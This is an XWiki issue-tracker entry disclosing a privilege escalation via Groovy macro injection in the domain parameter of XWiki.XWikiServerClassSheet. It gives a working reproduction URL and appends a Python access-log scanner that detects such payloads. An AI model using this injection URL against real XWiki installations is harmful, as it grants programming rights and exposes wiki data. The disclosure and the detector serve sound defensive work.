Project: XWiki Platform
Issue: XWIKI-19746

Privilege escalation (PR) with view rights on XWiki.XWikiServerClassSheet


Details

    • High
    • Unknown
    • N/A

    Description

      Steps to reproduce:

      1. Get the form token (attribute data-xwiki-form-token on any page).
      2. Open the URL <server>/xwiki/bin/view/Main/?sheet=XWiki.XWikiServerClassSheet&form_token=<form_token>&action=delete&domain=foo%22%2F%7D%7D%7B%7Basync%20async%3D%22true%22%20cached%3D%22false%22%20context%3D%22doc.reference%22%7D%7D%7B%7Bgroovy%7D%7Dprintln(%22hello%20from%20groovy!%22)%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D, where <server> is the server of the XWiki installation and <form_token> is the form token you obtained in the first step.

      Expected result:
      The message "Wiki alias "foo"/}}async async="true" cached="false" context="doc.reference"groovy}}println("hello from groovy!"){{/groovy/async" does not exists." is displayed (or any other error message).

      Actual result:
      The message "Wiki alias "foo" does not exists.hello from groovy!"/}}" is displayed, or in other words, the Groovy code has been executed.

      This demonstrates a privilege escalation from just view rights on XWiki.XWikiServerClassSheet and a single other document (in this example, it is the main page, it can be any other page) to programming rights. As the result of the macro execution is displayed, this can not only be used to modify the wiki but also quite easily to disclose all information in the wiki without modifying it.

      The affects version is only the version on which I reproduced the issue; this is very likely much older.
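As an added example (not part of this report and not XWiki project code), the following Python scanner flags requests whose query parameters carry wiki macro syntax, such as the `{{async}}`/`{{groovy}}` injection in the reproduction URL above, so that attempts can be spotted in web server access logs. The log lines and parameter values are constructed for illustration, not captured from any server.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Opening or closing wiki-macro delimiter followed by a macro name, e.g.
# "{{async ..." or "{{/groovy". A genuine wiki alias never contains "{{".
MACRO_RE = re.compile(r"\{\{\s*/?([A-Za-z][\w-]*)")
# Common Log Format request line: "METHOD path HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST|PUT) (\S+) HTTP/[\d.]+"')


def macro_params(url: str) -> dict:
    """Map each query parameter whose decoded value contains macro syntax to
    the macro names found, e.g. {"domain": ["async", "groovy", ...]}."""
    hits = {}
    for key, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        # parse_qsl decoded once; unquote again to catch double encoding.
        names = MACRO_RE.findall(unquote(value))
        if names:
            hits[key] = names
    return hits


def scan_access_log(lines) -> list:
    """Return (line_no, sheet, hits) for each request that selects a sheet
    (sheet=...) and carries macro syntax in any parameter value."""
    findings = []
    for line_no, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = match.group(1)
        params = dict(parse_qsl(urlsplit(url).query, keep_blank_values=True))
        hits = macro_params(url)
        if hits and "sheet" in params:
            findings.append((line_no, params["sheet"], hits))
    return findings


# Constructed sample log (not from any real server). Line 2 mirrors the
# reproduction URL in the report; lines 1 and 3 are benign requests.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2022:10:00:00 +0000] "GET /xwiki/bin/view/Main/ HTTP/1.1" 200 5120',
    '10.0.0.9 - - [01/Jan/2022:10:00:01 +0000] "GET /xwiki/bin/view/Main/?sheet=XWiki.XWikiServerClassSheet&form_token=abc&action=delete&domain=foo%22%2F%7D%7D%7B%7Basync%20async%3D%22true%22%7D%7D%7B%7Bgroovy%7D%7Dprintln(1)%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D HTTP/1.1" 200 4096',
    '10.0.0.9 - - [01/Jan/2022:10:00:02 +0000] "GET /xwiki/bin/view/Main/?sheet=XWiki.XWikiServerClassSheet&action=delete&domain=wiki.example.org HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for line_no, sheet, hits in scan_access_log(SAMPLE_LOG):
        print(f"line {line_no}: sheet={sheet} macro syntax in {hits}")
```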

            People

              Michael Hamann